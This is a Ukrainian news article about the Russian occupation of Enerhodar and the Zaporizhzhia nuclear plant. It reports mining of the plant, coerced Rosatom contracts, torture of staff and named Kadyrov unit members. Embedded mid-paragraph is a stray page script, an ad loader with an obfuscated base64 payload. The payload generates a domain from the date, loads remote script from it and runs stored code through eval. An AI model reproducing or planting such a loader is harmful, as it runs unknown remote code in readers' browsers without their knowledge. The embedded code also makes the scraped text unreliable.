Що відбувається в Енергодарі та на ЗАЕС

Ситуація в Енергодарі залишається напруженою. Працівників ЗАЕС тиском та через катування змушують підписувати контракти з «Росатомом» та отримувати російське громадянство. «Слідство.Інфо» поспілкувалося зі співробітниками станції та міським головою окупованого Енергодара.

Журналісти «Слідство.Інфо» з’ясували, як живе Енергодар у російські окупації та ідентифікували військових, які можуть бути причетними до катувань українців.

ЩО ВІДБУВАЄТЬСЯ В ЕНЕРГОДАРІ

Як розповів «Слідству.Інфо» міський голова Енергодара Дмитро Орлов, ситуація в місті зберігається напруженою — ліків, продуктів та засобів гігієни критично не вистачає. Росіяни вдаються до примусової паспортизації місцевого населення.

«Дуже активно продовжуються обшуки квартир. Окупанти поводяться агресивно. У місті залишається близько 15 тисяч людей (до окупації в Енергодарі було близько 53 тисяч мешканців, — ред.). Іде тиск на місцевих щодо паспортизації і також на працівників атомної станції щодо підписання контрактів з «Росатомом», — каже Дмитро Орлов.

За даними міського голови, на сьогодні до 1000 російських військових знаходяться на ЗАЕС.

На фото чоловік у синьому костюмі сидить за столом. На столі лежать папери, праворуч стоїть принтер.

Дмитро Орлов — міський голова нині окупованого Енергодара Запорізької області

«Це кадирівські полки. У них ротації там досить часто відбуваються. Останні два тижні «кадирівців» багато. Хто і кому підпорядковується, тут важко сказати. На початку вторгнення у них взагалі були конфлікти між собою», — говорить Орлов.

Міський голова розповідає про мінування росіянами ЗАЕС та узбережжя Каховського водосховища.

«Заміновано по периметру ЗАЕС. Також заміновано лісосмуги і періодично навіть поблизу ЗАЕС, навіть поблизу технологічного обладнання ці міни вибухають, оскільки там тварини дикі потрапляють під ці розтяжки та вибухові пристрої. І періодично навіть інспектори МАГАТЕ (Міжнародне агентство з атомної енергії, — ред.) чують вибухи неподалік від атомної станції. Міни, які спрацювали, вони (росіяни, — ред.) знов ставлять. Територія атомної станції залишається замінованою», — розповідає Дмитро Орлов.

«Слідству.Інфо» також вдалось поспілкуватися з працівниками ЗАЕС, які досі перебувають у місті. З міркувань їхньої безпеки імена не розкриваються.

Вони підтвердили інформацію про замінування станції і розповіли про можливі наслідки підриву.

«Заміновані деякі системи безпеки, що може призвести до неможливості експлуатації реакторів на кілька років», — сказав працівник ЗАЕС.

На його думку, це зроблено для терору. Ситуація в місті складна — російські військові чинять тиск на місцевих жителів.

За інформацією «Слідства.Інфо», в Енергодарі перебувають російські військові з кадировських підрозділів «Ахмат».

У МІСТІ КАТУЮТЬ ТА ВИКРАДАЮТЬ ЛЮДЕЙ

Протягом року росіяни викрадають і катують жителів Енергодара, які відмовляються співпрацювати з окупантами та отримувати російське громадянство. А працівників ЗАЕС змушують підписувати контракти з «Росатомом».

За словами міського голови Дмитра Орлова, в місті залишається частина робітників атомної станції — 2-3 тисячі з них ходять на роботу, решті росіяни заблокували перепустки, тому люди не можуть ані виїхати з міста, ані потрапити на ЗАЕС.

«Фактично вони як заручники. Якщо не підписують контракти з компанією від «Росатому» і не отримують російські паспорти, то окупанти блокують перепустки. Якщо, звичайно, що це не є критичний персонал, який вони не можуть замінити. І тому змушені давати змогу працювати і забезпечувати ядерну радіаційну безпеку нашим працівникам», — каже Дмитро Орлов.

Але водночас таких працівників росіяни викрадають та піддають тортурам, щоб змусити підписати контракт з «Росатомом» та змінити громадянство.

Викрадення чоловіка з зупинки на вулиці

«Тиск чиниться постійно і є непоодинокі випадки, коли навіть фізично тиснуть, тобто і фізичне побиття, і психологічне знущання. Навіть на робочому місці. І військові, і представники спецслужб тиснуть, викрадають, і забирають до катівень людей, які відмовляються підписувати контракт», — говорить міський голова.

Працівниця ЗАЕС, з якою зв’язалися журналісти, наразі не ходить на роботу. Жінка розповіла, що в Енергодарі стало значно менше людей. Частина з них виїхала, коли це було ще можливо. А деяких окупанти викрали. Так, її близьких окупанти заарештували та вивезли в невідомому напрямку ще минулого року. Викрадені українці також працювали на ЗАЕС.

«Забирають тих, хто не хоче співпрацювати з окупантами та не отримує російські паспорти. Особливо чіпляються до чоловіків. Їх забирають у поліцію та катують», — каже жінка.

За її словами, деякі працівники, які підписали контракти з російською компанією, здають колег представникам ФСБ (спецслужба РФ, — ред.): «А ФСБ ходить за адресами та перевіряють усіх».

На думку Дмитра Орлова, росіяни намагаються зламати місцевих та примусовим отриманням російського паспорта поставити їм клеймо зрадників, щоб якомога більша частина населення не чекала на деокупацію.

«Персонал тримається. Це важко. Понад рік вже цей тиск і він тільки посилюється з кожним днем. Зараз відбувається примусова паспортизація… з фізичним і психологічним тиском», — говорить Дмитро Орлов.

Слова міського голови підтвердили працівники ЗАЕС, з якими журналістам «Слідства.Інфо» вдалось зв’язатись. За їхніми свідченнями, зараз на станції відбувається «експлуатація ядерного об’єкта з порушеннями регламентів та міжнародного права».

Працівник ЗАЕС також підтвердив, що на станції залишається близько 3000 персоналу. До окупації працювало приблизно 12 тисяч. Він не знає точно, скільки людей підписало контракт з російською компанією, але не всі зробили це добровільно.

«Деякі тільки після тортур. Вивозили робітників, спершу тих, хто відповідає за експлуатацію, та піддавали тортурам – використовували електрошок, різали пальці до кісток. Мене особисто забирали 4 рази», — розповідає чоловік.

РОСІЙСЬКІ ВІЙСЬКОВІ ТА КОЛАБОРАНТИ В ЕНЕРГОДАРІ

Так званим директором ЗАЕС окупанти назначили Юрія Чернійчука, який до повномасштабного вторгнення займав посаду заступника головного інженера станції.

Після захоплення ЗАЕС Чернійчук погодився очолити створену на її базі фейкову «експлуатуючу організацію», яка підпорядковується «Росатому».

СБУ вже оголосила чоловіку підозру у пособництві державі-агресорці. Також встановлено, що Юрій Чернійчук змушує українських атомників підписувати контракти зі псевдоустановою, та допомагає підключати українські електростанції до енергосистеми РФ.

Підозра окупаційному очільнику ЗАЕС

Окрім Чернійчука, як додали працівники станції, до тиску на робітників причетний радник голови «Росенергоатому» Ренат Карчаа.

В Енергодарі переважно базуються кадирівські підрозділи. Це підтверджується пропагандистськими новинами в російських ЗМІ.

Наприклад, в лютому 2023-го на каналі «Росcия 24» вийшов репортаж про ОМОН «Ахмат-1» Росгвардії Чеченської республіки, який патрулює місто.

Скрін репортажу РосЗМІ про ОМОН «Ахмат-1» Росгвардії Чеченської республіки

ОМОН «Ахмат-1» був створений нещодавно, у вересні 2022-го, і задіяний у війні проти України. Очолює підрозділ Аліхан Шавхалов з позивним «Легіон». var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Аліхан Шавхалов (посередині)

Аліхан перебуває на окупованих територіях Запорізької області та активно бере участь у війні проти України, керуючи своїм підрозділом. Його присутність в Енергодарі підтверджують пропагандистські ролики російських ЗМІ.

Аліхан Шавхалов

Аліхан Шавхалов в Енергодарі у випуску телеканалу “Росія-24” розповідає про дії омонівців в місті.

Аліхан Шавхалов

Аліхан Шавхалов в Енергодарі у випуску телеканалу “Росія-24” розповідає про дії омонівців в місті.

Аліхан Шавхалов

Аліхан Шавхалов в Енергодарі у випуску телеканалу “Росія-24” розповідає про дії омонівців в місті.

Журналісти «Слідства.Інфо» ідентифікували ще кількох омонівців з «Ахмату-1», які перебували у Енергодарі.

25-річний Равиль Іспаров з Грозного. За інформацією з соцмереж, окупант навчався в Чеченському державному педагогічному університеті на факультеті фізкультури.

Равиль Іспаров

Равиль Іспаров

Равиль Іспаров

Равиль Іспаров

Равиль Іспаров

Равиль Іспаров

На цьому фото Равиль разом з іншими російськими військовими — Мансуром Бійгереєвим та, ймовірно, Камалом Юсуповим — також з ОМОНу «Ахмат-1».

Равиль Іспаров з Юсуповим та Бійгереєвим

Ідентифіковано також 29-річного Білала Ісраілова з Грозного. Він має декілька фото з геотегом в Енергодарі.

Білал Ісраілов

Білал Ісраілов

Білал Ісраілов

Білал Ісраілов

Білал Ісраілов

Білал Ісраілов

Білал Ісраілов

Білал Ісраілов

Крім новоствореного кадирівського ОМОНу, в Енергодарі був й підрозділ «Ахмат-Грозний» під керівництвом Анзора Бісаєва.

Анзор Бісаєв ліворуч

За даними українських правоохоронців, саме Бісаєв причетний до викрадення підлітка в Київській області. Бісаєв допитував неповнолітнього про ЗСУ, а потім змусив вийти з будинку на вулицю, де, за його наказом, окупанти схопили хлопця. Вони приставили йому до горла ніж та, погрожуючи пістолетом, продовжили допит. Правоохоронці вже повідомили Бісаєву за це про підозру.

Анзор Бісаєв також був в Енергодарі та перебував на території ЗАЕС. Про це свідчать повідомлення Рамзана Кадирова.

Також встановлено, що бійці підрозділу «Ахмат-Грозний» охороняли виборчі дільниці під час псевдореферендуму в Енергодарі.

Журналісти встановили ще одного бійця «Ахмата-Грозного» — Хізіра Бадідаєва з Грозного.

Хізір Бадідаєв з Грозного

У нього є кілька фото з геотегом в Енергодарі, на якому він разом з іншими російськими військовими. Наразі Бадідаєв, ймовірно, на Донеччині, в окупованій Попасній. (adsbygoogle = window.adsbygoogle || []).push({});

Источник: https://akzent.zp.ua/shho-vidbuvayetsya-v-energodari-ta-na-zaes/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

нет
scroll to top